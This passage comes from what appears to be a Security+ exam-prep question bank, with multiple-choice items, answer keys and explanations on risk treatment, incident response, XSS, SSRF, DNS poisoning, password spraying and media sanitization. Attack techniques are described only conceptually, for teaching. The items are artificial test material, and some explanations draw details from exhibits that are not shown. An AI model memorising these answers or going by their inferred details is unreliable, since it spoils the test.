.Threat Hunting
.Risk Assessment

Why this answer

The NIST SP 800-61 Revision 2 framework defines the incident response lifecycle as consisting of four phases: Preparation, Detection and Analysis, Containment/Eradication/Recovery, and Post-Incident Activity. These phases form a continuous cycle, with lessons learned from Post-Incident Activity feeding back into Preparation. The question asks for the four recognized phases, and these four options directly match the NIST model.

Exam trap

The trap here is that candidates may confuse proactive security activities like Threat Hunting or Risk Assessment with the formal incident response phases, but NIST SP 800-61 strictly lists only the four phases given as correct answers.

949
MCQeasy

A legacy application cannot be patched for two weeks, but the security team still wants to reduce risk in the meantime. What is the best temporary measure?

A.Do nothing until the patch window opens.
B.Add a compensating control such as restricting access to the system.
C.Disable all logging so the system runs faster.
D.Rename the application so attackers cannot find it.
AnswerB

A compensating control lowers risk while the permanent fix is unavailable.

Why this answer

Option B is correct because implementing a compensating control, such as restricting network access via firewall rules or disabling unnecessary services, reduces the attack surface while the legacy application remains unpatched. This aligns with the principle of defense-in-depth, where temporary mitigations like access control lists (ACLs) or host-based firewalls can block exploit vectors until the patch is applied.

Exam trap

The trap here is that candidates may choose 'Do nothing' assuming patching is the only valid action, but CompTIA expects you to recognize that compensating controls are a standard risk management strategy when immediate patching is not feasible.

How to eliminate wrong answers

Option A is wrong because doing nothing leaves the vulnerability exposed, increasing the risk of exploitation during the two-week window, which violates the security team's goal of risk reduction. Option C is wrong because disabling logging degrades visibility and audit capabilities, making it harder to detect or investigate attacks, and does not address the underlying vulnerability.

950
MCQeasy

A company uses a SaaS file-sharing platform for employee documents. Which action is the company's responsibility, not the provider's?

A.Patching the vendor's application servers.
B.Setting user sharing permissions and access controls for company data.
C.Replacing failed disks in the provider's storage cluster.
D.Maintaining the cloud provider's identity center and hypervisor.
AnswerB

In a SaaS model, the provider manages the application and underlying infrastructure, but the customer remains responsible for how the service is used. That includes user provisioning, access permissions, sharing settings, and data handling decisions. Configuring who can see or edit documents is a customer duty because it directly affects the organization's confidentiality and compliance obligations.

Why this answer

In a SaaS model, the provider manages the underlying infrastructure, including application servers, storage, and hypervisors. The customer is responsible for configuring access controls and permissions for their own data within the application. Option B correctly identifies this shared responsibility boundary.

Exam trap

The trap here is that candidates often confuse the SaaS model with IaaS or PaaS, incorrectly assuming the customer is responsible for patching or hardware maintenance, when in fact the provider handles all infrastructure layers in SaaS.

How to eliminate wrong answers

Option A is wrong because patching the vendor's application servers is the provider's responsibility under the SaaS shared responsibility model, not the customer's. Option C is wrong because replacing failed disks in the provider's storage cluster is an infrastructure maintenance task owned by the SaaS provider. Option D is wrong because maintaining the cloud provider's identity center and hypervisor is part of the provider's responsibility for the underlying platform, not the customer's.

951
MCQhard

Based on the exhibit, which issue should be remediated FIRST? The team can only fully fix one issue today. Management wants the choice that best reduces real-world risk, not just the highest severity score.

A.Internet-facing VPN appliance
B.Internal HR file server
C.Lab workstation
D.DMZ reporting server
AnswerA

This asset is externally reachable, has a known public exploit, and lacks compensating controls. That combination creates the highest immediate likelihood of compromise.

Why this answer

The Internet-facing VPN appliance is the highest priority because it is directly exposed to untrusted networks (the Internet), making it the most likely entry point for attackers. A compromise here could lead to full network access, bypassing all other security controls, which represents the greatest real-world risk regardless of its severity score.

Exam trap

The trap here is that candidates often fixate on the highest CVSS severity score (e.g., a critical vulnerability on the internal server) rather than considering the attack surface and likelihood of exploitation, which is the core of risk-based prioritization.

How to eliminate wrong answers

Option B (Internal HR file server) is wrong because it resides on the internal network and is not directly reachable from the Internet, so its exposure is limited to already-authenticated users; remediating it first would not reduce external attack surface. Option C (Lab workstation) is wrong because it is isolated in a lab environment, typically with restricted network access and no sensitive production data, making its compromise low-impact. Option D (DMZ reporting server) is wrong because while it is in a DMZ, it is not Internet-facing (it is behind the firewall and only accessible from internal or specific external sources), so its risk is lower than a directly exposed VPN gateway.

952
MCQhard

Based on the exhibit, what is the most likely explanation for the suspicious workstation activity?

A.Ransomware campaign
B.Fileless attack
C.Worm propagation
D.Rootkit persistence
AnswerB

The exhibit shows legitimate Windows tools launching hidden, encoded PowerShell from a scheduled task, with no dropped executable on disk. That pattern strongly suggests a fileless attack, where the payload runs primarily in memory and uses trusted utilities to reduce visibility. The periodic connections after execution also fit a lightweight backdoor or loader rather than a traditional malware binary.

Why this answer

The exhibit shows a PowerShell command that downloads and executes a payload directly in memory without writing to disk. This is a classic indicator of a fileless attack, where malicious code runs in volatile memory (e.g., via PowerShell, WMI, or macros) to evade traditional file-based antivirus detection. The use of `Invoke-Expression` (IEX) with a remote URL confirms the attack vector is fileless.

Exam trap

The trap here is that candidates see a PowerShell command and assume it is a worm or ransomware, but the key detail is the in-memory execution (no file written) which is the hallmark of a fileless attack, not the payload's ultimate goal.

How to eliminate wrong answers

Option A is wrong because ransomware typically encrypts files and leaves ransom notes, but the exhibit shows no evidence of file encryption or ransom demands—only a suspicious PowerShell download cradle. Option C is wrong because worm propagation requires self-replicating code that spreads across networks without user interaction, whereas the exhibit shows a single command executed on one workstation with no lateral movement indicators. Option D is wrong because rootkit persistence involves hiding processes or files at the kernel level (e.g., via driver hooks or MBR modification), but the exhibit shows a one-time in-memory execution with no persistence mechanism like scheduled tasks or registry run keys.

953
MCQmedium

A weekly scan reports three findings: a medium-severity missing patch on a lab VM with no network access, a high-severity default credential on a management interface reachable from the internet, and a low-severity outdated browser plug-in on a visitor kiosk. Which issue should be remediated first?

A.The medium-severity missing patch on the isolated lab VM.
B.The low-severity outdated browser plug-in on the visitor kiosk.
C.The high-severity default credential on the management interface exposed to the internet.
D.All three issues have the same priority because they were found in the same scan cycle.
AnswerC

Exposure and exploitability drive priority. A default credential on an internet-reachable management interface presents immediate unauthorized access risk and should be addressed before issues on isolated or lower-risk assets.

Why this answer

Option C is correct because the high-severity default credential on a management interface reachable from the internet represents an immediate, exploitable risk. Default credentials are well-known and can be used by attackers to gain full administrative control over the device, often leading to a complete compromise of the network. In contrast, the other findings have compensating controls (no network access) or lower impact (outdated browser plug-in), making them lower priority in a risk-based remediation strategy.

Exam trap

The trap here is that candidates focus solely on the severity label (high vs. medium vs. low) without considering the compensating controls or exposure, leading them to incorrectly rank the missing patch or outdated plug-in as higher priority.

How to eliminate wrong answers

Option A is wrong because the lab VM has no network access, which means the missing patch cannot be exploited remotely; the risk is contained and can be remediated later. Option B is wrong because an outdated browser plug-in on a visitor kiosk is low severity and typically has limited attack surface (e.g., no saved credentials, restricted user privileges), so it does not pose an immediate threat compared to an internet-exposed default credential. Option D is wrong because not all findings have the same priority; risk severity is determined by both the vulnerability's severity and the exposure/impact, and the high-severity default credential with internet exposure clearly outweighs the others.

954
MCQhard

A facilities manager receives an SMS from "FedEx Delivery" saying a shipment for the research lab cannot clear security until the recipient verifies the package by signing in. The message includes the manager's initials and the warehouse code, and the link opens a cloned sign-in page. Which attack is most likely?

A.Smishing, because the attacker is using a text message to deliver a targeted credential lure.
B.Vishing, because the attacker is pretending to be a delivery service representative.
C.Spear phishing, because the message is targeted using the recipient's role and location.
D.Baiting, because the message offers a shipment verification reward to encourage action.
AnswerA

Smishing is the best answer because the attack arrives by SMS and is designed to push the victim to a fake login page. The personalized details make it more convincing, but the defining factor is the text-message delivery channel combined with credential harvesting. This is a common real-world approach for bypassing inbox filtering and exploiting mobile trust.

Why this answer

Smishing is a social engineering attack that uses SMS (Short Message Service) to deliver a fraudulent message designed to trick the recipient into revealing sensitive information. In this scenario, the attacker sends a text message impersonating FedEx, includes the manager's initials and warehouse code for personalization, and provides a link to a cloned sign-in page, which is the classic credential-harvesting mechanism of a smishing attack.

Exam trap

The trap here is that candidates confuse the targeted nature of the message (which suggests spear phishing) with the delivery vector (SMS), but the exam specifically tests the distinction between phishing subtypes based on the communication channel used.

How to eliminate wrong answers

Option B is wrong because vishing (voice phishing) involves a phone call, not an SMS text message; the attack described uses a text message with a link, not a voice call. Option C is wrong because spear phishing is a form of email-based phishing that targets a specific individual or organization; while the message is targeted, the delivery method is SMS, not email, making smishing the more precise classification.

955
MCQmedium

Based on the exhibit, which network redesign would best limit lateral movement between user endpoints and building systems after a workstation compromise?

A.Move every device into a single flat subnet so internal routing is simpler.
B.Separate workstations, phones, badge readers, and cameras into different VLANs with ACLs or firewall rules between them.
C.Keep the design unchanged and rely on antivirus on the workstations to block access to the cameras.
D.Put all traffic through the guest Wi-Fi VLAN to isolate it from the corporate network.
AnswerB

Separating device classes into distinct VLANs creates clear trust boundaries and limits what a compromised endpoint can reach. Inter-VLAN ACLs or firewall rules can then enforce only the necessary traffic paths, such as management or service traffic. This reduces lateral movement from a workstation to sensitive building systems like cameras and badge readers.

Why this answer

Option B is correct because segmenting workstations, phones, badge readers, and cameras into separate VLANs with ACLs or firewall rules between them enforces micro-segmentation. This prevents a compromised workstation from directly initiating lateral movement to building systems (e.g., cameras or badge readers) by restricting inter-VLAN traffic at Layer 3/4, limiting the blast radius of an attack.

Exam trap

The trap here is that candidates often think antivirus or a flat network simplifies management, but the SY0-701 exam specifically tests the principle of network segmentation to contain lateral movement, not just endpoint protection or network simplicity.

How to eliminate wrong answers

Option A is wrong because a single flat subnet removes all network segmentation, allowing any compromised endpoint to directly communicate with any other device (including building systems) via Layer 2 broadcast or unicast, which maximizes lateral movement risk. Option C is wrong because relying solely on antivirus on workstations does not block network-level access to cameras; antivirus is a host-based detection tool that cannot prevent a compromised workstation from sending malicious traffic to other IP addresses on the same subnet. Option D is wrong because putting all traffic through the guest Wi-Fi VLAN would isolate it from the corporate network, but it would also isolate building systems from necessary management traffic and does not provide granular segmentation between different device types; it also introduces performance and policy issues for non-Wi-Fi devices.

956
MCQmedium

A security architect is designing the network security for a web application hosted in a public cloud environment such as AWS. The application uses an Application Load Balancer (ALB) that distributes traffic to a fleet of web servers. The web servers must only accept traffic from the ALB, and all other inbound traffic must be blocked. The ALB itself needs to accept HTTP/HTTPS traffic from anywhere on the internet. Which of the following cloud security controls should the architect configure on the web servers' network interface to best meet this requirement, assuming the cloud provider offers both stateful and stateless network filtering options?

A.A stateless network ACL that allows inbound traffic from the ALB's subnet only.
B.A stateful security group that allows inbound traffic from the ALB's security group only.
C.A web application firewall (WAF) that inspects all traffic for SQL injection.
D.A host-based firewall on each web server that allows traffic from the ALB's private IP address.
AnswerB

Correct. Security groups are stateful and can use another security group as a source. This configuration cleanly allows only traffic originating from the ALB, automatically handles return traffic, and is the recommended cloud-native approach for controlling instance-level access.

Why this answer

Option B is correct because a stateful security group in AWS can reference another security group as a source, allowing inbound traffic only from instances associated with the ALB's security group. This ensures that web servers accept traffic exclusively from the ALB, while the ALB itself can accept HTTP/HTTPS from the internet via its own security group rules. Stateful filtering automatically allows return traffic, simplifying rule management and meeting the requirement precisely.

Exam trap

The trap here is that candidates often confuse stateless network ACLs with stateful security groups, assuming a subnet-based ACL is sufficient, but they overlook that ACLs cannot filter by security group and require bidirectional rule management, making them unsuitable for this precise ALB-only access requirement.

How to eliminate wrong answers

Option A is wrong because a stateless network ACL requires explicit inbound and outbound rules, and referencing a subnet rather than a security group does not restrict traffic to only the ALB—any instance in that subnet could send traffic, violating the requirement. Additionally, stateless ACLs do not automatically allow return traffic, requiring separate outbound rules, which adds complexity and potential misconfiguration. Option C is wrong because a web application firewall (WAF) inspects application-layer traffic for threats like SQL injection but does not control network-layer access; it cannot block all non-ALB traffic at the network interface level, so it fails to meet the core requirement of restricting inbound traffic to only the ALB.

957
MCQmedium

A resolver log shows multiple clients querying the correct internal host name, but the DNS server starts returning an unexpected public IP address after a burst of unsolicited DNS responses from outside the network. Users are sent to a lookalike login page. What type of attack is most likely occurring?

A.DNS poisoning
B.Brute-force authentication
C.Port scanning
D.Packet sniffing
AnswerA

DNS poisoning is the best fit when incorrect DNS records or forged responses cause clients to resolve a legitimate name to a malicious address.

Why this answer

The scenario describes a DNS poisoning (also known as DNS cache poisoning) attack. The burst of unsolicited DNS responses from outside the network is the attacker injecting forged DNS records into the resolver's cache, causing it to map the correct internal host name to an unexpected public IP address. This redirects users to a lookalike login page, which is the classic outcome of DNS poisoning.

Exam trap

The trap here is that candidates may confuse DNS poisoning with packet sniffing because both involve network traffic, but only DNS poisoning actively modifies cached resolution data to redirect users.

How to eliminate wrong answers

Option B is wrong because brute-force authentication involves repeatedly trying passwords against a login interface, not manipulating DNS responses to redirect traffic. Option C is wrong because port scanning is used to discover open ports on a target system, not to alter DNS resolution or redirect users to a fake site. Option D is wrong because packet sniffing passively captures network traffic for analysis, but it does not inject forged DNS responses or modify the resolver's cache.

958
Multi-Selecthard

A records manager finds paper onboarding forms and scanned copies that contain government ID numbers. The retention period has expired, no legal hold exists, and the forms are no longer needed. Which three actions should occur before disposal? Select three.

Select 3 answers
A.Verify the retention schedule and confirm that no legal hold or exception applies.
B.Move the forms to an unsecured archive so they can be retrieved later if needed.
C.Destroy the paper copies with an approved secure method such as cross-cut shredding or pulping.
D.Securely delete the electronic copies from active storage and follow backup-retention rules for residual copies.
E.Keep personal copies because auditors might ask informally later.
AnswersA, C, D

You should never destroy records until retention and legal obligations are checked and documented.

Why this answer

Option A is correct because before any disposal, the records manager must verify the retention schedule and confirm that no legal hold or exception applies. This ensures compliance with organizational policy and legal requirements, preventing premature destruction of records that may still be needed for litigation or audit purposes.

Exam trap

The trap here is that candidates may think moving records to an unsecured archive (Option B) is a safe intermediate step, but the CompTIA SY0-701 exam emphasizes that once retention expires and no hold exists, secure destruction is mandatory—not relocation.

959
MCQhard

Based on the exhibit, which access change best follows least privilege while still allowing the help desk to complete the task?

A.Add helpdesk_27 to Domain_Admin for seven days, since the request is urgent and time-limited.
B.Use a shared administrator password so the technician can finish the ticket without changing group memberships.
C.Grant helpdesk_27 the Helpdesk_Admin role for the ticket and remove it after completion.
D.Ask the user's manager to perform the reset manually so the help desk does not need additional access.
AnswerC

Granting the narrower Helpdesk_Admin role is the best least-privilege choice because it gives the technician only the permissions needed to unlock the account and reset MFA. The role is specific to the job function and can be removed after the ticket is complete. That limits exposure while still allowing the work to be finished efficiently.

Why this answer

Option C is correct because it implements Role-Based Access Control (RBAC) by granting the help desk technician a temporary, ticket-specific role (Helpdesk_Admin) that provides just enough privileges to perform the password reset without granting broader administrative rights. This follows the principle of least privilege by limiting the elevated access to the exact scope and duration needed, and the role can be automatically revoked after the ticket is closed, minimizing the attack surface.

Exam trap

The trap here is that candidates may choose Option A because it appears to limit the duration of elevated access, but they overlook that Domain_Admin membership provides far more privileges than needed for a single password reset, violating the core principle of least privilege.

How to eliminate wrong answers

Option A is wrong because adding helpdesk_27 to Domain_Admin grants full domain administrative privileges, which far exceed what is needed for a single password reset and violates least privilege by providing persistent, overly broad access even if time-limited. Option B is wrong because using a shared administrator password violates the principle of non-repudiation (no individual accountability) and introduces a shared credential security risk, as all actions would be attributed to the shared account rather than the specific technician. Option D is wrong because it bypasses the help desk's role entirely and places an operational burden on the user's manager, which is inefficient, not scalable, and does not address the need for the help desk to have appropriate access to perform their job function.

960
MCQmedium

A company portal lets employees save a short profile bio. One employee enters a string containing script code, and later other users who view that profile are redirected to a fake sign-in page. What vulnerability best explains this behavior?

A.Reflected cross-site scripting, because the payload only appears in the current request response.
B.Stored cross-site scripting, because the malicious script is saved and served to other users later.
C.Command injection, because the script runs inside the web server process.
D.Session fixation, because the attacker wants the victim to use an old session ID.
AnswerB

Stored XSS occurs when malicious script is persisted by the application, such as in a profile field, comment, or message. Every user who later loads the page receives the harmful content. The redirection to a fake sign-in page shows that the script is executing in other users’ browsers, which makes this a stored, not reflected, attack. Proper output encoding and input handling are needed to prevent it.

Why this answer

The employee's profile bio is saved to the server and later served to other users who view the profile. This is the defining characteristic of stored (persistent) cross-site scripting (XSS): the malicious script is permanently stored on the target server and executed in the browsers of other users when they retrieve the stored data.

Exam trap

The trap here is confusing stored XSS with reflected XSS by focusing on the 'current request' aspect rather than recognizing that the payload is saved and served to other users later, which is the key differentiator.

How to eliminate wrong answers

Option A is wrong because reflected XSS requires the payload to be part of the current request (e.g., in a URL parameter or form input) and is not permanently stored; it only affects the user who submits the request. Option C is wrong because command injection targets the server-side operating system by injecting system commands (e.g., via shell metacharacters like ';' or '|'), not client-side script execution in a browser.

961
Multi-Selectmedium

A company-owned laptop is suspected in an insider theft case and legal says the evidence may be used in court. Which two actions best support evidence admissibility during transport to the evidence locker? Select two.

Select 2 answers
A.Document the chain of custody with the collector, date, time, device condition, and transfer history.
B.Place the laptop in a tamper-evident bag or seal and record the seal number.
C.Browse the user’s files to confirm whether the laptop contains stolen documents.
D.Remove the hard drive and place it in an unmarked box for convenience.
E.Let the employee continue using the laptop until legal staff are available.
AnswersA, B

This is essential because admissibility depends on showing who handled the evidence, when they handled it, and whether it remained intact. Detailed chain-of-custody records help prove the item was not altered or contaminated. Courts and legal teams rely on this documentation to establish integrity from collection through storage and analysis.

Why this answer

Option A is correct because documenting the chain of custody establishes a clear, unbroken record of who handled the evidence, when, and under what conditions. This is critical for admissibility in court, as it demonstrates that the evidence has not been tampered with or altered since collection. Without proper chain-of-custody documentation, the defense could argue that the laptop's integrity was compromised, potentially rendering the evidence inadmissible.

Exam trap

The trap here is that candidates might think previewing files is a valid investigative step, but in forensic evidence handling, any access to the original data must be done through a write-blocker and on a forensic copy, not by browsing the live system, to avoid altering evidence.

962
MCQmedium

A security architect is designing a new data center network that will host public-facing web servers and internal application servers handling confidential employee data. The architect places the web servers in a DMZ and the internal application servers on a separate internal network segment. A stateful firewall is configured to allow inbound HTTP/HTTPS traffic from the internet to the web servers only. The firewall also permits only the web servers to initiate outbound connections to the internal application servers on a specific TCP port, and all such traffic is encrypted using TLS. Which security architecture principle is this design primarily intended to enforce?

A.Least privilege
B.Defense in depth
C.Separation of duties
D.Zero trust
AnswerB

Correct. The design uses network segmentation, firewalls, and encryption to create multiple layers of defense. This is the core concept of defense in depth, ensuring that a failure in one layer does not compromise the entire system.

Why this answer

The design enforces defense in depth by layering multiple security controls: a DMZ isolates public-facing web servers from internal networks, a stateful firewall restricts inbound traffic to HTTP/HTTPS only, and outbound connections from web servers to internal application servers are limited to a specific TCP port with TLS encryption. This layered approach ensures that even if one control fails (e.g., a web server is compromised), the attacker still faces additional barriers to reach sensitive internal systems.

Exam trap

The trap here is that candidates confuse 'defense in depth' with 'least privilege' because both involve restricting access, but defense in depth specifically refers to multiple overlapping security layers (network segmentation, firewalls, encryption) rather than minimal permissions for a single component.

How to eliminate wrong answers

Option A is wrong because least privilege would focus on granting only the minimum necessary permissions to users or processes, but the scenario describes network segmentation and traffic filtering, not user or service account permissions. Option C is wrong because separation of duties involves dividing critical tasks among different individuals to prevent fraud or error, whereas this design is about network architecture and access controls, not role-based task division.

963
MCQmedium

After a ransomware event, the team restores a file server from backup, but management wants proof that the restore process will work before the backups are declared trusted. What should be done next?

A.Delete the old backup copies to prevent future confusion
B.Perform a test restore in an isolated environment and verify the recovered data
C.Switch to incremental backups only so the next restore is faster
D.Store the backups on the same file server so they are easier to access
AnswerB

A test restore is the best way to validate backup integrity and operational readiness after an incident. Restoring in isolation confirms that the backup can be used successfully without risking production systems. Verification should include checking file integrity, application access if relevant, and whether the restored data meets recovery objectives. This provides evidence that backups remain trustworthy after ransomware.

Why this answer

Option B is correct because the only way to prove that backups are trustworthy is to perform a test restore in an isolated environment, verifying the integrity and completeness of the recovered data. This validates that the backup process, media, and software are functioning correctly without risking the production environment. Without a successful test restore, the team cannot confirm that the backups are free from corruption, encryption, or other issues that would prevent a real recovery.

Exam trap

The trap here is that candidates may think simply having backups is sufficient proof of recoverability, but the exam emphasizes that only a successful test restore in an isolated environment can validate the backup's integrity and the restore process itself.

How to eliminate wrong answers

Option A is wrong because deleting old backup copies does not prove the restore process works and actually removes potentially valuable recovery points, violating the 3-2-1 backup rule. Option C is wrong because switching to incremental backups only does not validate the current restore process; it changes the backup strategy without addressing the need for proof of recoverability, and incremental backups actually require a full backup chain to restore, increasing complexity. Option D is wrong because storing backups on the same file server violates the fundamental principle of backup isolation, making them vulnerable to the same ransomware attack that encrypted the original data, and it does not test the restore process at all.

964
MCQmedium

A cloud-hosted API lets users supply a URL for the service to fetch an image. Shortly after release, logs show requests to 169.254.169.254 and internal admin addresses. What control best reduces this risk?

A.Allow the API to follow any redirect so it works with more image sources.
B.Restrict outbound requests to an allowlist and block internal address ranges.
C.Store the fetched image in encrypted form before sending it to users.
D.Increase the session timeout to reduce repeated logins by legitimate users.
AnswerB

This is a classic server-side request forgery pattern: the server is making attacker-influenced requests to internal or metadata addresses. An allowlist of approved destinations, combined with blocking private and link-local ranges, prevents the service from being used as a proxy into internal systems. That control directly targets the unsafe outbound request behavior and is more effective than trying to clean malicious URLs after the fact. It also reduces exposure to cloud metadata theft and internal service probing.

Why this answer

Option B is correct because restricting outbound requests to an allowlist and blocking internal address ranges directly mitigates the Server-Side Request Forgery (SSRF) vulnerability. The requests to 169.254.169.254 (the AWS/GCP/Azure metadata endpoint) and internal admin addresses indicate an attacker is using the API to probe internal services. An allowlist ensures the API only connects to trusted external hosts, while blocking private and link-local ranges prevents access to internal infrastructure.

Exam trap

The trap here is that candidates may confuse data-at-rest protection (encryption) with access control, or mistakenly think allowing redirects improves functionality without realizing it exacerbates SSRF; Cisco often tests the specific cloud metadata endpoint (169.254.169.254) as a classic SSRF indicator.

How to eliminate wrong answers

Option A is wrong because allowing the API to follow any redirect would actually increase the SSRF risk, as an attacker could craft a redirect from an allowed external URL to an internal or metadata endpoint, bypassing initial URL checks. Option C is wrong because storing the fetched image in encrypted form does not prevent the API from making unauthorized requests to internal or metadata endpoints; encryption protects data at rest, not the request origin or destination.

965
MCQhard

A stateless firewall sits between a DMZ subnet 10.10.10.0/24 and an internal subnet 10.10.20.0/24. Only the web server at 10.10.10.25 should be allowed to initiate TCP sessions to the app server at 10.10.20.20 on port 8443. All other DMZ-to-internal traffic must remain blocked. Which ACL entry is the best fit on the DMZ-facing interface?

A.deny tcp 10.10.10.0/24 10.10.20.0/24 eq 8443 followed by permit ip any any
B.permit tcp host 10.10.10.25 host 10.10.20.20 eq 8443 followed by deny ip any any
C.permit tcp host 10.10.20.20 host 10.10.10.25 eq 8443 followed by deny ip any any
D.permit ip 10.10.10.0/24 10.10.20.0/24 followed by deny ip any any
AnswerB

This rule is the least-privilege match for the stated requirement. It allows only the specific source host, destination host, and destination port needed for the application flow, while the explicit deny blocks all remaining DMZ-to-internal traffic on that interface. Because the firewall is stateless, narrowing the source and destination at the entry point is the safest way to prevent unintended exposure.

Why this answer

Option B is correct because it explicitly permits only the web server at 10.10.10.25 to initiate TCP sessions to the app server at 10.10.20.20 on port 8443, then denies all other traffic. Since the firewall is stateless, it cannot track session state, so the ACL must be applied on the DMZ-facing interface to control outbound-initiated traffic from the DMZ to the internal subnet. The permit statement uses the 'host' keyword for precise source and destination, followed by an explicit deny all to block any other DMZ-to-internal traffic.

Exam trap

The trap here is that candidates often reverse the source and destination in the permit statement (as in Option C), mistakenly thinking the ACL should allow the app server to respond, rather than correctly permitting the web server to initiate the connection from the DMZ to the internal subnet.

How to eliminate wrong answers

Option A is wrong because it denies the specific traffic (TCP from 10.10.10.0/24 to 10.10.20.0/24 on port 8443) that should be permitted, and then permits all other traffic, which would allow unauthorized DMZ hosts to reach the internal subnet. Option C is wrong because it reverses the source and destination, permitting the app server at 10.10.20.20 to initiate sessions to the web server on port 8443, which violates the requirement that only the web server should initiate the connection. Option D is wrong because it permits all IP traffic from the entire DMZ subnet to the internal subnet, which would allow any DMZ host to reach any internal host, completely bypassing the restriction to only the web server and only on port 8443.

966
MCQeasy

A new SIEM rule generates many alerts from a scheduled backup job that is known to be legitimate. What should the analyst do to improve alert quality?

A.Disable all logging for the backup server.
B.Tune the rule to exclude the known backup activity pattern.
C.Ignore the alerts permanently because the job is approved.
D.Reimage the backup server to stop the alerts.
AnswerB

Alert tuning should reduce false positives without losing useful detection. If the backup job is documented and legitimate, the analyst can adjust the rule to exclude that approved activity pattern or server. This keeps the SIEM useful and helps responders focus on real suspicious behavior instead of repeated harmless alerts.

Why this answer

Option B is correct because tuning the SIEM rule to exclude the known backup activity pattern reduces false positives while preserving detection of actual threats. By creating an exception for the specific backup server's IP, schedule, or process hash, the analyst maintains visibility into anomalous behavior without being overwhelmed by noise.

Exam trap

The trap here is that candidates may choose to disable logging or ignore alerts, confusing operational convenience with proper security hygiene, when the correct approach is to refine detection logic through tuning.

How to eliminate wrong answers

Option A is wrong because disabling all logging for the backup server would create a blind spot, preventing detection of real threats like ransomware encrypting backup data or unauthorized access to backup files. Option C is wrong because ignoring alerts permanently violates security monitoring best practices and could allow a malicious actor to hide activity within the backup job's noise. Option D is wrong because reimaging the backup server is an extreme, unnecessary measure that does not address the root cause—the SIEM rule's lack of specificity—and would disrupt operations without solving the alert volume issue.

967
MCQmedium

An organization is retiring a batch of laptops with SSDs. All of the systems used full-disk encryption and stored sensitive internal documents. What is the best action before the devices leave the company?

A.Run a quick format and remove the asset tags after the files are deleted.
B.Perform a cryptographic erase by destroying the encryption keys and document the sanitization process.
C.Degauss the SSDs and then store them in the disposal room until pickup.
D.Overwrite the drives once with random data and consider the devices ready for resale.
AnswerB

For encrypted SSDs, destroying the encryption keys is an effective and practical sanitization method because the data becomes unreadable even if the drive is later examined. This approach matches the media type and the fact that full-disk encryption was used. Proper documentation also supports accountability and compliance. It is stronger than merely deleting files or performing a superficial format, which may leave recoverable data behind.

Why this answer

Option B is correct because a cryptographic erase (also known as a crypto-scrub) renders the encrypted data permanently inaccessible by securely destroying the encryption keys. Since the SSDs used full-disk encryption (FDE), the data is already encrypted at rest, and without the keys, the ciphertext is effectively unrecoverable. This method is fast, reliable, and compliant with sanitization standards like NIST SP 800-88, making it the best action before the devices leave the organization.

Exam trap

The trap here is that candidates often choose degaussing (Option C) for SSDs, mistakenly applying a technique that works only for magnetic media like HDDs, while ignoring that cryptographic erase is the proper and efficient method for encrypted solid-state drives.

How to eliminate wrong answers

Option A is wrong because a quick format only removes the file system pointers, not the actual data; the encrypted content remains on the SSD and could potentially be recovered if the encryption keys are still present. Option C is wrong because degaussing SSDs is ineffective—SSDs use flash memory that is not affected by magnetic fields, and degaussing can physically destroy the drive without guaranteeing data removal. Option D is wrong because overwriting SSDs with random data is unreliable due to wear-leveling and over-provisioning; the SSD firmware may remap bad blocks, leaving remnants of the original encrypted data intact.

968
MCQmedium

A security analyst receives an automated alert indicating that a standard user account logged in from a geographic location that is unusual for the user, and the login occurred at 3:00 AM local time. The analyst has not yet verified whether this was a successful login or if any additional suspicious activity occurred. According to standard incident response procedures, what should the analyst do NEXT?

A.Disable the user account immediately and reset the password.
B.Conduct a full forensic analysis of the user's workstation.
C.Review the account's recent activity for signs of compromise.
D.Report the incident to law enforcement.
AnswerC

Reviewing recent activity (e.g., successful logins, file access, privilege escalation attempts) is the appropriate analysis step to validate the alert. This helps determine if the account is compromised and guides subsequent containment and eradication actions.

Why this answer

The correct next step is to review the account's recent activity to gather more context. According to the NIST incident response process (Preparation, Detection & Analysis, Containment, Eradication & Recovery, Post-Incident Activity), after detection the analyst should perform analysis to validate the alert and determine the scope. Reviewing recent logins, accessed files, and other actions helps decide if containment is needed.

Immediately disabling the account (A) could be premature if the alert is a false positive or if the user is traveling. Conducting a full forensic analysis (B) is too resource-intensive for a single alert without further evidence. Reporting to law enforcement (D) is not appropriate at this stage; that would occur after a confirmed incident that meets legal thresholds.

969
MCQeasy

A business wants to keep operating even if a supplier-related loss occurs, so it purchases cyber insurance to offset possible costs. Which risk treatment is being used?

A.Avoidance, because the company is eliminating the supplier relationship
B.Mitigation, because insurance removes the risk before it happens
C.Acceptance, because the company is doing nothing about the exposure
D.Transfer, because some financial impact is shifted to another party
AnswerD

Risk transfer is the correct answer because insurance moves some of the financial burden to the insurer while the company continues the activity.

Why this answer

Purchasing cyber insurance transfers the financial risk of a supplier-related loss to the insurance company. This is a classic risk transfer strategy, where the business does not eliminate or reduce the likelihood of the loss but shifts the financial impact to another party via a contractual agreement.

Exam trap

The trap here is confusing risk transfer (shifting financial impact) with risk mitigation (reducing likelihood or impact), leading candidates to incorrectly select mitigation when insurance is involved.

How to eliminate wrong answers

Option A is wrong because avoidance would mean terminating the supplier relationship entirely, not purchasing insurance. Option B is wrong because mitigation involves implementing controls (e.g., firewalls, redundancy) to reduce the likelihood or impact of a risk, not transferring it via insurance. Option C is wrong because acceptance means acknowledging the risk without taking any action, whereas purchasing insurance is an active treatment.

970
Multi-Selecthard

A SIEM report shows this sequence over 25 minutes: the same public IP submitted one failed password attempt against 53 different accounts, then one account successfully authenticated, created an inbox forwarding rule, and downloaded hundreds of messages through the web portal. Which two conclusions are best supported? Select two.

Select 2 answers
A.The pattern is consistent with a password spraying attack.
B.The attacker is performing a brute-force attack against one account.
C.The activity is most likely credential stuffing with multiple known password pairs.
D.The successful account is likely compromised and being used for persistence or mailbox abuse.
E.The events primarily indicate a denial-of-service attack against the mail system.
AnswersA, D

One failed attempt across many accounts from one source fits password spraying, which avoids lockouts by keeping per-account attempts low.

Why this answer

Option A is correct because the SIEM shows a single public IP attempting one failed password against 53 different accounts over 25 minutes. This pattern—low-and-slow, one attempt per account—is the hallmark of a password spraying attack, which avoids account lockout thresholds by never hitting the same account repeatedly. The subsequent successful authentication and mailbox abuse confirm the attacker found a weak password for one account.

Exam trap

The trap here is confusing password spraying (one password, many accounts) with brute-force (many passwords, one account) or credential stuffing (many known pairs), leading candidates to pick B or C despite the single-IP, single-attempt-per-account pattern.

971
MCQeasy

A security team wants every company laptop to have the same screen-lock timeout, disk encryption setting, and local firewall configuration. Which type of document should define these mandatory settings?

A.A guideline, because employees can decide whether to follow it.
B.A standard, because it specifies mandatory technical requirements.
C.A risk register, because it tracks all security vulnerabilities on laptops.
D.A business impact analysis, because it identifies the most important laptop functions.
AnswerB

